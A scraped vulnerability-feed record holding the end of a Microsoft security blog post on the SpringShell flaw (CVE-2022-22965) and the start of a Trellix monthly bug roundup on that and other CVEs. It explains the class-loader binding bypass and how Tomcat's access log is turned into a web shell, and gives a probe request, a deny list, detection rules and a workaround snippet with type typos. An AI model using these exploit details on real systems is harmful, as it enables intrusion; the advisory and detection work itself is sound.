vulnerabilities disclosed in the same component are less critical and not tracked as part of this blog.\n\nImpacted systems have the following traits:\n\n * Running JDK 9.0 or later\n * Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and earlier versions\n * Apache Tomcat as the Servlet container:\n * Packaged as a traditional Java web archive (WAR) and deployed in a standalone Tomcat instance; typical Spring Boot deployments using an embedded Servlet container or reactive web server are not impacted\n * Tomcat has _spring-webmvc_ or _spring-webflux_ dependencies\n\nAny system using JDK 9.0 or later and using the Spring Framework or derivative frameworks should be considered vulnerable. The following nonmalicious command can be used to determine vulnerable systems:\n \n \n $ curl host:port/path?class.module.classLoader.URLs%5B0%5D=0\n\nA host that returns an HTTP 400 response should be considered vulnerable to the attack detailed in the proof of concept (POC) below. Note that while this test is a good indicator of a system\u2019s susceptibility to an attack, any system within the scope of impacted systems listed above should still be considered vulnerable.\n\nThe [](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>)[threat and vulnerability management](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-tvm>) console within [Microsoft 365 Defender](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>) provides detection and reporting for this vulnerability.\n\nThis blog covers the following topics:\n\n 1. Observed activity\n 2. Attack breakdown\n 3. The vulnerability and exploit in depth\n * Background\n * Request mapping and request parameter binding\n * The process of property binding\n * The vulnerability and its exploitation\n * Prelude: CVE-2010-1622\n * The current exploit: CVE-2022-22965\n * From ClassLoader to AccessLogValve\n 4. Discovery and mitigations\n * How to find vulnerable devices\n * Enhanced protection with Azure Firewall Premium\n * Detect and protect with Azure Web Application Firewall (Azure WAF)\n * Global WAF with Azure Front Door\n * Regional WAF with Azure Application Gateway\n * Patch information and workarounds\n 5. Detections\n * Microsoft 365 Defender\n * Endpoint detection and response (EDR)\n * Antivirus\n * Hunting\n * Microsoft 365 Defender advanced hunting queries \n * Microsoft Sentinel\n\n## Observed activity\n\nMicrosoft regularly monitors attacks against our cloud infrastructure and services to defend them better. Since the Spring Core vulnerability was announced, we have been tracking a low volume of exploit attempts across our cloud services for Spring Cloud and Spring Core vulnerabilities. For CVE-2022-22965, the attempts closely align with the basic web shell POC described in this post.\n\nMicrosoft\u2019s continued monitoring of the threat landscape has not indicated a significant increase in quantity of attacks or new campaigns at this time.\n\n## Attack breakdown\n\nCVE-2022-22965 affects functions that use request mapping annotation and Plain Old Java Object (POJO) parameters within the Spring Framework. The POC code creates a controller that, when loaded into Tomcat, handles HTTP requests. \n\nThe only publicly available working POC is specific to Tomcat server's logging properties via the _ClassLoader_ module in the _propertyDescriptor_ cache. The attacker can update the _AccessLogValve_ class using the module to create a web shell in the Tomcat root directory called _shell.jsp_. The attacker can then change the default access logs to a file of their choosing.\n\nFigure 1. Screenshot from the original POC code post\n\nThe changes to _AccessValveLog_ can be achieved by an attacker who can use HTTP requests to create a _.jsp_ file in the service\u2019s root directory. In the example below, each GET parameter is set as a Java object property. Each GET request then executes a Java code resembling the example below, wherein the final segment \u201csetPattern\u201d would be unique for each call (such as setPattern, setSuffix, setDirectory, and others): \n\n Figure 2. Screenshot from the original POC code post Figure 3. Screenshot from the original POC code post\n\nThe _.jsp_ file now contains a payload with a password-protected web shell with the following format:\n\n\n\nThe attacker can then use HTTP requests to execute commands. While the above POC depicts a command shell as the inserted code, this attack could be performed using any executable code.\n\n## The vulnerability and exploit in depth\n\nThe vulnerability in Spring results in a client's ability, in some cases, to modify sensitive internal variables inside the web server or application by carefully crafting the HTTP request.\n\nIn the case of the Tomcat web server, the vulnerability allowed for that manipulation of the access log to be placed in an arbitrary path with somewhat arbitrary contents. The POC above sets the contents to be a JSP web shell and the path inside the Tomcat's web application ROOT directory, which essentially drops a reverse shell inside Tomcat. For the web application to be vulnerable, it needs to use Spring\u2019s request mapping feature, with the handler function receiving a Java object as a parameter.\n\n### Background\n\n#### Request mapping and request parameter binding\n\nSpring allows developers to map HTTP requests to Java handler methods. The web application's developer can ask Spring to call an appropriate handler method each time a user requests a specific URI. For instance, the following web application code will cause Spring to invoke the method _handleWeatherRequest_ each time a user requests the URI _/WeatherReport_:\n \n \n @RequestMapping(\"/WeatherReport\")\n public string handleWeatherRequest(Location reportLocation)\n {\n \u2026\n }\n\nMoreover, through request parameter binding, the handler method can accept arguments passed through parameters in GET/POST/REST requests. In the above example, Spring will instantiate a _Location_ object, initialize its fields according to the HTTP request\u2019s parameters, and pass it on to _handleWeatherRequest_. So, if, for instance, _Location_ will be defined as:\n \n \n class Location \n { \n public void setCountry(string country) {\u2026} \n public void setCity(string city) {\u2026} \n public string getCountry() {\u2026} \n public string getCity() {\u2026} \n }\n\nIf we issue the following HTTP request:\n \n \n example.com/WeatherReport?country=USA&city=Redmond\n\nThe resulting call to _handleWeatherRequest_ will automatically have a _reportLocation_ argument with the country set to USA and city set to Redmond. \n\nIf _Location_ had a sub-object named _coordinates_, which contained _longitude_ and _latitude_ parameters, then Spring would try and initialize them out of the parameters of an incoming request. For example, when receiving a request with GET params _coordinates.longitude=123&coordinate.latitude=456_ Spring would try and set those values in the _coordinates_ member of _location_, before handing over control to _handleWeatherRequest_.\n\nThe SpringShell vulnerability directly relates to the process Spring uses to populate these fields.\n\n#### The process of property binding\n\nWhenever Spring receives an HTTP request mapped to a handler method as described above, it will try and bind the request\u2019s parameters for each argument in the handler method. Now, to stick with the previous example, a client asked for:\n \n \n example.com/WeatherReport?x.y.z=foo\n\nSpring would instantiate the argument (in our case, create a _Location_ object). Then it breaks up the parameter name by dots (.) and tries to do a series of steps:\n\n 1. Use Java introspection to map all accessors and mutators in _location_\n 2. If location has a getX_()_ accessor, call it to get the _x_ member of location\n 3. Use Java introspection to map all accessors and mutators in the_ x_ object\n 4. If the _x_ object has a _getY_() accessor, call it to get the _y_ object inside of the _x_ object\n 5. Use Java introspection to map all accessors and mutators in the_ y_ object\n 6. If the _y_ object has a _setZ()_ mutator, call it with parameter _\u201cfoo\u201d_\n\nSo essentially, ignoring the details, we get _location.getX().getY().setZ(\u201cfoo\u201d)_.\n\n### The vulnerability and its exploitation\n\n#### Prelude: CVE-2010-1622\n\nIn June 2010, a CVE was [published](<https://nvd.nist.gov/vuln/detail/CVE-2010-1622>) for the Spring framework. The crux of the CVE was as follows:\n\n 1. All Java objects implicitly contain a _getClass()_ accessor that returns the _Class_ describing the object's class.\n 2. _Class_ objects have a _getClassLoader()_ accessor the gets the _ClassLoader_ object.\n 3. Tomcat uses its own class loader for its web applications. This class loader contains various members that can affect Tomcat\u2019s behavior. One such member is _URLs_, which is an array of URLs the class loader uses to retrieve resources.\n 4. Overwriting one of the URLs with a URL to a remote JAR file would cause Tomcat to subsequently load the JAR from an attacker-controlled location.\n\nThe bug was fixed in Spring by preventing the mapping of the _getClassLoader()_ or _getProtectionDomain()_ accessors of _Class_ objects during the property-binding phase. Hence _class.classLoader_ would not resolve, thwarting the attack.\n\n#### The current exploit: CVE-2022-22965\n\nThe current exploit leverages the same mechanism as in CVE-2010-1622, bypassing the previous bug fix. Java 9 added a new technology called Java Modules. An accessor was added to the _Class_ object, called _getModule()_. The _Module_ object contains a _getClassLoader()_ accessor. Since the CVE-2010-1622 fix only prevented mapping the _getClassLoader()_ accessor of _Class_ objects, Spring mapped the _getClassLoader()_ accessor of the _Module_ object. Once again, one could reference the class loader from Spring via the _class.module.classLoader_ parameter name prefix.\n\n#### From _ClassLoader_ to _AccessLogValve_\n\nThe latest exploit uses the same accessor chaining, via the Tomcat class loader, to drop a JSP web shell on the server.\n\nThis is done by manipulating the properties of the _AccessLogValve_ object in Tomcat\u2019s pipeline. The _AccessLogValve _is referenced using the _class.module.classLoader.resources.context.parent.pipeline.first_ parameter prefix.\n\nThe following properties are changed:\n\n 1. **Directory: **The path where to store the access log, relative to Tomcat\u2019s root directory. This can be manipulated to point into a location accessible by http requests, such as the web application\u2019s directory.\n 2. **Prefix: **The prefix of the access log file name\n 3. **Suffix: **The suffix of the access log file name. The log file name is a concatenation of the prefix with the suffix.\n 4. **Pattern: **A string that describes the log record structure. This can be manipulated so that each record will essentially contain a JSP web shell.\n 5. **FileDateFormat:** Setting this causes the new access log settings to take effect.\n\nOnce the web shell is dropped on the server, the attacker can execute commands on the server as Tomcat.\n\n## Discovery and mitigations\n\n### How to find vulnerable devices\n\n[Threat and vulnerability management](<https://www.microsoft.com/security/business/threat-protection/threat-vulnerability-management>) capabilities in [Microsoft Defender for Endpoint](<https://www.microsoft.com/security/business/threat-protection/endpoint-defender>) monitor an organization\u2019s overall security posture and equip customers with real-time insights into organizational risk through continuous vulnerability discovery, intelligent prioritization, and the ability to seamlessly remediate vulnerabilities. \n\nCustomers can now search for CVE-2022-22965 to find vulnerable devices through the [Weaknesses](<https://securitycenter.microsoft.com/vulnerabilities?search=CVE-2022-22965>) page in threat and vulnerability management.\n\nFigure 4. Weaknesses page in Microsoft Defender for Endpoint\n\n### Enhanced protection with Azure Firewall Premium\n\nCustomers using [Azure Firewall Premium](<https://docs.microsoft.com/azure/firewall/premium-migrate>) have enhanced protection from the SpringShell CVE-2022-22965 vulnerability and exploits. Azure Firewall Premium Intrusion Detection and Prevention System (IDPS) provides IDPS inspection for all east-west traffic, outbound traffic to the internet, and inbound HTTP traffic from the internet. The vulnerability rulesets are continuously updated and include vulnerability protection for SpringShell since March 31, 2022. The screenshot below shows all the scenarios which are actively mitigated by Azure Firewall Premium.\n\nConfigure Azure Firewall Premium with both IDPS Alert & Deny mode and TLS inspection enabled for proactive protection against CVE-2022-22965 exploit. \n\nFigure 5. Azure Firewall Premium portal detecting CVE-2022-22965 exploitation attempts.\n\nCustomers using Azure Firewall Standard can migrate to Premium by following [these directions](<https://docs.microsoft.com/azure/firewall/premium-migrate>). Customers new to Azure Firewall Premium can learn more about [Firewall Premium](<https://docs.microsoft.com/azure/firewall/premium-features>).\n\n### Detect and protect with Azure Web Application Firewall (Azure WAF)\n\nAzure Web Application Firewall (WAF) customers with Azure Front Door and Azure Application Gateway deployments now have enhanced protection for the SpringShell exploit - [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>), and other high impact Spring vulnerabilities [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>) and [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>). To help detect and mitigate these critical Spring vulnerabilities, we have released four new rules.\n\n#### Global WAF with Azure Front Door\n\nAzure WAF has updated Default Rule Set (DRS) versions 2.0/1.1/1.0.\n\n * Rule group: _MS-ThreatIntel-WebShells_, Rule Id: 99005006 - Spring4Shell Interaction Attempt\n * Rule group: _MS-ThreatIntel-CVEs_, Rule Id: 99001014 - Attempted Spring Cloud routing-expression injection (CVE-2022-22963)\n * Rule group: _MS-ThreatIntel-CVEs_, Rule Id: 99001015 - Attempted Spring Framework unsafe class object exploitation (CVE-2022-22965)\n * Rule group: _MS-ThreatIntel-CVEs_, Rule Id: 99001016 - Attempted Spring Cloud Gateway Actuator injection (CVE-2022-22947)\n\nWAF rules on Azure Front Door are disabled by default on existing Microsoft managed rule sets.\n\nFigure 6. Screenshot of WAF Spring vulnerabilities\n\n#### Regional WAF with Azure Application Gateway\n\nAzure WAF has updated OWASP Core Rule Set (CRS) versions for Azure Application Gateway WAF V2 regional deployments. New rules are under _Known_CVEs_ rule group:\n\n * Rule Id: 800110 - _Spring4Shell Interaction Attempt_\n * Rule Id: 800111 - _Attempted Spring Cloud routing-expression injection_ - CVE-2022-22963\n * Rule Id: 800112 - _Attempted Spring Framework unsafe class object exploitation_ - CVE-2022-22965\n * Rule Id: 800113 - _Attempted Spring Cloud Gateway Actuator injection_ - CVE-2022-22947\n\nWAF rules on Azure Application Gateway are _enabled_ by default for supported CRS versions.\n\nFigure 7. Spring vulnerability rules for Azure Application Gateway OWASP Core Rule Set (CRS)\n\n**Recommendation**: Enable WAF SpringShell rules to get protection from these threats. We will continue to monitor threat patterns and modify the above rules in response to emerging attack patterns as required. \n\nFor more information about Managed Rules and Default Rule Set (DRS) on Azure Front Door, see the [Web Application Firewall DRS rule groups and rules documentation](<https://docs.microsoft.com/azure/web-application-firewall/afds/waf-front-door-drs>). For more information about Managed Rules and OWASP Core Rule Set (CRS) on Azure Application Gateway, see the [Web Application Firewall CRS rule groups and rules documentation](<https://docs.microsoft.com/en-us/azure/web-application-firewall/ag/application-gateway-crs-rulegroups-rules?tabs=owasp32>)\n\n### Patch information and workarounds\n\nCustomers are encouraged to apply these mitigations to reduce the impact of this threat. Check the recommendations card in Microsoft 365 Defender threat and vulnerability management for the deployment status of monitored mitigations.\n\n * An [update](<https://spring.io/blog/2022/03/31/spring-boot-2-6-6-available-now>) is available for CVE-2022-22965. Administrators should upgrade to versions 5.3.18 or later or 5.2.19 or later. If the patch is applied, no other mitigation is necessary.\n\nIf you\u2019re unable to patch CVE-2022-22965, you can implement this set of workarounds published by [Spring](<https://www.springcloud.io/post/2022-03/spring-framework-rce-early-announcement/#gsc.tab=0>):\n\n * Search the @InitBinder annotation globally in the application to see if the dataBinder.setDisallowedFields method is called in the method body. If the introduction of this code snippet is found, add `{\"class.*\",\"Class.*\",\"*.class.*\", \"*.Class.*\"}` to the original blacklist. (**Note:** If this code snippet is used a lot, it needs to be appended in each location.)\n * Add the following global class into the package where the Controller is located. Then recompile and test the project for functionality:\n \n \n import org.springframework.core.annotation.Order;\n import org.springframework.web.bind.WebDataBinder;\n import org.springframework.web.bind.annotation.ControllerAdvice;\n import org.springframework.web.bind.annotation.InitBinder;\n @ControllerAdvice\n @Order(10000)\n public class GlobalControllerAdvice{\n @InitBinder\n public void setAllowedFields(webdataBinder dataBinder){\n String[]abd=new string[]{\"class.*\",\"Class.*\",\"*.class.*\",\"*.Class.*\"};\n dataBinder.setDisallowedFields(abd);\n }\n }\n\n## Detections\n\n### Microsoft 365 Defender\n\n#### Endpoint detection and response (EDR)\n\nAlerts with the following title in the security center can indicate threat activity on your network:\n\n * Possible SpringShell exploitation\n\nThe following alerts for an observed attack, but might not be unique to exploitation for this vulnerability:\n\n * Suspicious process executed by a network service\n\n#### Antivirus\n\nMicrosoft Defender antivirus version **1.361.1234.0** or later detects components and behaviors related to this threat with the following detections:\n\n * Trojan:Python/SpringShellExpl\n * Exploit:Python/SpringShell\n * Backdoor:PHP/Remoteshell.V\n\n### Hunting\n\n#### Microsoft 365 Defender advanced hunting queries \n\nUse the query below to surface exploitation of CVE-2022-22965 on both victim devices and devices performing the exploitation. Note that this query only covers HTTP use of the exploitation and not HTTPS.\n \n \n DeviceNetworkEvents\n | where Timestamp > ago(7d)\n | where ActionType =~ \"NetworkSignatureInspected\"\n | where AdditionalFields contains \".jsp?cmd=\"\n | summarize makeset(AdditionalFields, 5), min(Timestamp), max(Timestamp) by DeviceId, DeviceName \n\n#### Microsoft Sentinel\n\nMicrosoft Sentinel customers can use the following queries to look for this threat activity:\n\n * [Possible SpringShell exploitation attempt (CVE-2022-22965)](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting Queries/AzureDiagnostics/SpringShellExploitationAttempt.yaml>) \u2013 This hunting query looks in Azure Web Application Firewall data to find possible SpringShell exploitation attempt (CVE-2022-22965) to drop a malicious web shell in a location accessible by HTTP requests. Attackers then make requests to the malicious backdoor to run system commands.\n * [Possible web shell usage attempt related to SpringShell (CVE-2202-22965)](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting Queries/AzureDiagnostics/SpringshellWebshellUsage.yaml>) \u2013 This hunting query looks in Azure Web Application Firewall data to find possible web shell usage related to SpringShell RCE vulnerability (CVE-2022-22965).\n * [AV detections related to SpringShell Vulnerability](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityAlert/AVSpringShell.yaml>) \u2013 This query looks for Microsoft Defender for Endpoint hits related to the SpringShell vulnerability. In Microsoft Sentinel, the _SecurityAlerts _table includes only the device name of the affected device. This query joins the _DeviceInfo _table to clearly connect other information such as device group, IP address, signed in users, and others. This allows the Microsoft Sentinel analyst to have more context related to the alert, if available.\n\n**Revision history**\n\n_[04/11/2022] \u2013 _Application Gateway now has enhanced protection for critical Spring vulnerabilities - [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>), [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>), and [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>)._ _See _Detection and Mitigation section for details_.\n\n_[04/08/2022] \u2013 Azure Web Application Firewall (WAF) customers with Azure Front Door now has enhanced protection for Spring4Shell exploits - CVE-2022-22963, CVE-2022-22965, and CVE-2022-22947. See Detection and Mitigation section for details. \n[04/05/2022] \u2013 We added Microsoft Sentinel hunting queries to look for SpringShell exploitation activity._\n\nThe post [SpringShell RCE vulnerability: Guidance for protecting against and detecting CVE-2022-22965](<https://www.microsoft.com/security/blog/2022/04/04/springshell-rce-vulnerability-guidance-for-protecting-against-and-detecting-cve-2022-22965/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-05T01:11:24", "type": "mssecure", "title": "SpringShell RCE vulnerability: Guidance for protecting against and detecting CVE-2022-22965", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2022-22947", "CVE-2022-22963", "CVE-2022-22965", "CVE-2202-22965"], "modified": "2022-04-05T01:11:24", "id": "MSSECURE:07417E2EE012BAE0350B156AD2AE30B3", "href": "https://www.microsoft.com/security/blog/2022/04/04/springshell-rce-vulnerability-guidance-for-protecting-against-and-detecting-cve-2022-22965/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "trellix": [{"lastseen": "2022-05-04T00:00:00", "description": "# The Bug Report \u2013 April 2022 Edition \n\nBy Mark Bereza \u00b7 May 4, 2022\n\n## Your Cybersecurity Comic Relief\n\n Source: https://twitter.com/cyb3rops/status/1509290413168934918 \n\n\n### Why Am I here?\n\nFor those in my hemisphere, springtime is finally here and, like always, it promises change: the flowers are blooming, the birds are chirping, and seasonal allergies are in full swing \u2013 it is truly the greatest time of year. Some things, however, remain constant: death, taxes, The Bug Report, and Java ruining your life. We at Trellix are proud to continue bringing you the one thing on that list worth looking forward to, month after month.\n\nThis month featured some truly standout vulns, meaning our resident Shadow Council spent little time deliberating which ones would make the cut, giving us ample time to really dig into the ones that did:\n\n * CVE-2022-21449 aka \u201cPsychic Signatures\u201d: Java\n * CVE-2022-26809: MSRPC\n * CVE-2022-22965 aka \u201cSpring4Shell\u201d: [Spring Framework](<https://spring.io/projects/spring-framework>)\n\nThe more pedantic among you might be thinking, _\u201cWell, actually, Spring4Shell was reported in late March, so why is it in April\u2019s Bug Report?\u201d_ The short answer is that time is a social construct. The long answer is the vulnerability was reported right at the end of March (03/29), meaning by the time it became apparent just how critical it was, it was too late to include it in March\u2019s report. Better late than never! \n\n## CVE-2022-21449: Failing, even with a curve\n\n### What is it?\n\nIt is often said that cryptography is one of the few good things we have in cybersecurity, and for good reason. Unfortunately, cryptography is like a joke in that it\u2019s all about delivery, and even the best cryptographic algorithms can\u2019t prevent errors in implementation. Even more unfortunately, \u201ccryptography is like a joke\u201d is actually a perfect description of Java\u2019s [ECDSA](<https://en.wikipedia.org/wiki/Elliptic_Curve_Digital_Signature_Algorithm>) implementation. [With the release of Java 15](<https://bugs.openjdk.java.net/browse/JDK-8237218>), the original native code implementation was rewritten in Java, introducing a major bug that made it trivial to bypass its ECDSA signature validation, [according to Neil Madden of ForgeRock](<https://neilmadden.blog/2022/04/19/psychic-signatures-in-java/>). Madden first disclosed the vulnerability to Oracle in November of 2021, but chose not to go public with it until six months later, after Oracle finally addressed the issue in their [April 2022 Critical Patch Update (CPU)](<https://www.oracle.com/security-alerts/cpuapr2022.html>). In his article, Madden dubs the vuln \u201cPsychic Signatures,\u201d after the blank psychic paper used by Doctor Who as an all-purpose ID card \u2013 quite fitting.\n\nTo fully understand the mechanics of CVE-2022-21449 would require a crash course in elliptic curve cryptography \u2013 well beyond the scope of our humble report \u2013 so the short version is that an ECDSA signature consists of two values: _r_ and _s_. Validating an ECDSA signature involves checking that the left and right sides of a particular elliptic curve equation are indeed equal, with the left side being _r_, and the right side being proportional (kind of) to _s_. This equation becomes trivially true (0 = 0) if both _r_ and _s_ are zero, so such a signature would always be considered \u201cvalid\u201d regardless of the message contents or the key used. To address this, one of the steps in the ECDSA algorithm involves rejecting a signature as invalid if either _r_ or _s_ are zero \u2013 a step that Java\u2019s new implementation skipped. 00ps.\n\n### Who cares?\n\nECDSA is like plumbing; we use it all the time, but most people don\u2019t think about it until something goes wrong. The various fixtures powered by Java\u2019s ECDSA plumbing include many popular web authentication/authorization standards such as [JWT](<https://en.wikipedia.org/wiki/JSON_Web_Token>)s, [SAML](<https://en.wikipedia.org/wiki/Security_Assertion_Markup_Language>), and [WebAuthn](<https://en.wikipedia.org/wiki/WebAuthn>), responsible for gating access to sensitive resources on servers and even managing Single Sign-On (SSO) for users across security domains. Perhaps even more troubling, some SSL certificates utilize signatures generated using Java\u2019s ECDSA, in which case an attacker could leverage this vuln to man-in-the-middle encrypted traffic. This is all to say that you shouldn\u2019t let Oracle\u2019s incredibly conservative CVSS rating of 7.5 fool you into thinking this vuln isn\u2019t a big deal. As for which versions are impacted, Oracle has indicated that Java 15, 16, 17, and 18 prior to their April CPU are all vulnerable. \n\nAlthough the scope of CVE-2022-21449 is certainly smaller than the infamous [Log4Shell](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>), it\u2019s worth nothing that Log4Shell was a bug in a third-party Java library, whereas this is a bug in the Java runtime itself. Furthermore, Psychic Signatures is just as easy to exploit and [PoC code already exists](<https://github.com/khalednassar/CVE-2022-21449-TLS-PoC>), meaning that although there is currently no evidence of in-the-wild exploitation, it is far from unlikely. In short, if you cared about Log4Shell, then you should probably care about this, too.\n\n### What can I do?\n\nAs is often the case, the best thing you can do is patch ASAP, as Oracle\u2019s April CPU fully mitigates this vulnerability. If this isn\u2019t immediately possible, consider switching all your [Java Cryptography Architecture (JCA)](<https://docs.oracle.com/javase/8/docs/technotes/guides/security/crypto/CryptoSpec.html>) providers to [BouncyCastle](<https://www.bouncycastle.org/>), an open-source implementation devoid of this bug. If you\u2019re wondering if your organization is impacted, we suggest dusting off that list you made in the aftermath of Log4Shell for all the software in your environment that so much as looks at Java \u2013 there\u2019s bound to be a lot of overlap. Barring that, JFrog has released a [tool on GitHub](<https://github.com/jfrog/jfrog-CVE-2022-21449>) that can scan arbitrary JAR/WAR files for presence of the vulnerability, which may prove useful.\n\n \n\n\n## CVE-2022-26809: RPC, it\u2019s easy as 1 2 3\n\n### What is it?\n\nCVE-2022-26809 lacks the catchy monikers of our other two entries this month, but don\u2019t take that as a reflection of its import. Publicly disclosed on April 12 as part of Microsoft\u2019s Patch Tuesday, it is a fully remote, pre-authentication, zero-click vulnerability in [Microsoft Remote Procedure Call (MSRPC)](<https://en.wikipedia.org/wiki/Microsoft_RPC>), a core component of the Windows operating system that is enabled by default, network-accessible, and cannot be disabled without breaking things in the OS. I\u2019ll give everyone a second to pick their jaws up off the floor before continuing.\n\nThe vulnerability was submitted to Microsoft by [Cyber Kunlun](<https://www.cyberkl.com/>), a cybersecurity firm based out of Beijing, who provided Microsoft with an exploit that utilized the [Server Message Block (SMB) protocol](<https://docs.microsoft.com/en-us/windows/win32/fileio/microsoft-smb-protocol-and-cifs-protocol-overview>) as the attack vector. As a result, Microsoft initially recommended blocking TCP ports 139 and 445, ports utilized by SMB, in their [Microsoft\u2019s Security Update Guide](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809>). Although these ports are not specific to MSRPC, leaving them open can still result in exploitation of the vulnerability, as MSRPC can utilize SMB for transport. In theory, the same may hold true for MSRPC over TCP and MSRPC over HTTP.\n\nThat being said, there is currently very little credible information to be found regarding the specific details of what is needed to exploit the vulnerability besides some high-level analysis done by [Akamai](<https://www.akamai.com/blog/security/critical-remote-code-execution-vulnerabilities-windows-rpc-runtime>) and [MalwareTech](<https://www.malwaretech.com/2022/04/video-exploiting-windows-rpc-cve-2022-26809-explained-patch-analysis.html>) based on patch diffing. According to both sources, the patch added some integer overflow checks that protect against a potential heap overflow condition in functions responsible for processing RPC packets, presumably the means by which remote code execution would be possible.\n\n### Who cares?\n\nUltimately any org with any Windows footprint in their environment should be taking this very seriously, as exploits leveraging this vulnerability will be easily wormable, making it a prime vehicle for malware campaigns. Microsoft has also indicated that just about every version of Windows since Windows 7/Server 2008 is vulnerable, so don\u2019t expect being a decade behind on your Windows updates to save you \u2013 I\u2019m looking at you, healthcare industry.\n\nThankfully for all the sysadmins and analysts experiencing Vietnam flashbacks right now, there does not (as of this writing) appear to be any legitimate PoC code for CVE-2022-26809, much less any detected exploitation out in the wild, meaning there is still time to lock things down before the bad guys start sending payloads to every one of the 700,000 Windows machines with port 445 exposed to the internet:\n\n\n\nI\u2019m sure all 700,000 are fully patched\u2026 right?\n\n### What can I do?\n\nLike a broken record with a steadfast conscience, I will continue to tell you to patch your systems now. Like, **right now**. Since disabling RPC outright isn\u2019t feasible, patching and Viking funeral are your only two surefire means of keeping your Windows machines safe. But like a Sex Ed teacher preaching abstinence, I realize that providing alternate means of mitigating risk is equally important. If you can\u2019t patch right this second, a good starting point would be to block TCP ports 135 (MSRPC via TCP), 139 and 445 (MSRPC via SMB), and 593 (MSRPC via HTTP) on your perimeter firewall. Ultimately, however, good firewall rules are founded in whitelisting ports for necessary services, not blacklisting dangerous ones reactively like an unwinnable game of whack-a-mole.\n\n \n\n\n## CVE-2022-22965: Mirai botnet springs back to life\n\n### What is it?\n\nIn order to adequately describe what Spring4Shell is, it\u2019s important to first describe what it is **not** \u2013 it is **not** [CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>), a superficially similar vuln disclosed around the same time that allows for server-side code injection in [Spring Cloud Function](<https://spring.io/projects/spring-cloud-function>). In late March, during the first 72 hours of these two vulns going public, there was a lot of misinformation being spread on Twitter due to the conflation of these two vulnerabilities, with many referring to both as \u201cSpring4Shell.\u201d Canonically, however, Spring4Shell refers exclusively to CVE-2022-22965, and though both were granted a CVSS score of 9.8, Spring4Shell proper is far more impactful, hence its inclusion on our list and the omission of its ugly cousin.\n\nWith that out of the way, let\u2019s briefly describe what the Spring Framework is, as it\u2019s the target of this particular vulnerability. Put simply, it\u2019s a very popular open-source framework developed by VMware that aids with the development of enterprise-level Java applications by providing support for features such as dependency injection, data binding, and web frameworks for both model-view-controller (Spring MVC) and reactive (Spring WebFlux) designs. One of the features the Spring Framework provides to developers is the ability to map HTTP requests to specific handler methods. These request handler methods, in turn, can instantiate objects and automatically populate their members based on parameters provided via these same HTTP requests, a feature known as _parameter binding_.\n\nA much older bug, [CVE-2010-1622](<https://nvd.nist.gov/vuln/detail/CVE-2010-1622>), abused this feature combined with Java\u2019s built-in `[getClassLoader()](<https://www.tutorialspoint.com/java/lang/class_getclassloader.htm>)` method to manipulate Tomcat\u2019s `ClassLoader` object into loading a JAR file from an attacker-controller server, thereby achieving RCE. Spring quickly patched this attack vector by adding a check that excludes `getClassLoader()` from the parameter binding mechanism. The introduction of [Modules](<https://www.oracle.com/corporate/features/understanding-java-9-modules.html>) in Java 9, however, added another means of accessing a `ClassLoader`, thus creating a bypass for Spring\u2019s previous patch and giving birth to CVE-2022-22965. Unlike its ancestor, exploitation of Spring4Shell has largely involved creating a webshell (hence the name) on a target server running Tomcat by writing a custom .jsp file to the web root via Tomcat\u2019s `[AccessLogValve](<https://tomcat.apache.org/tomcat-7.0-doc/api/org/apache/catalina/valves/AccessLogValve.html>)` class, but the underlying vulnerability of abusing request parameter binding is largely identical.\n\n### Who cares?\n\nAs far as impact goes, there\u2019s good news and there\u2019s bad news. The good news is that not every Java app utilizing Spring Framework is vulnerable by default; for an app to be vulnerable, it must be meet all these criteria:\n\n * Uses JDK >= 9.0\n * Packaged as a Web Application Archive (WAR)\n * Deployed on a standalone Servlet container \n * The Servlet must have either the spring-webmvc or spring-webflux packages as a dependency\n * Uses a version of Spring Framework older than 5.2.20/5.3.18 (where the patch was introduced)\n\nThe bad news is that the bad guys have a sizable head start in this race. This is in part due to the details of the vulnerability and even a PoC exploit [being leaked](<https://twitter.com/vxunderground/status/1509170582469943303>) in advance of the CVE\u2019s planned publication, which was meant to coincide with Spring\u2019s patch. In fact, honeypots detected exploitation of Spring4Shell as early as March 31, just two days after disclosure, and exploitation attempts have continued ever since. The [initial PoC code](<https://github.com/TheGejr/SpringShell>) made public was specific to Spring applications that used Tomcat Servlet containers, but Spring has since confirmed that [both Payara and Glassfish Servlets are also 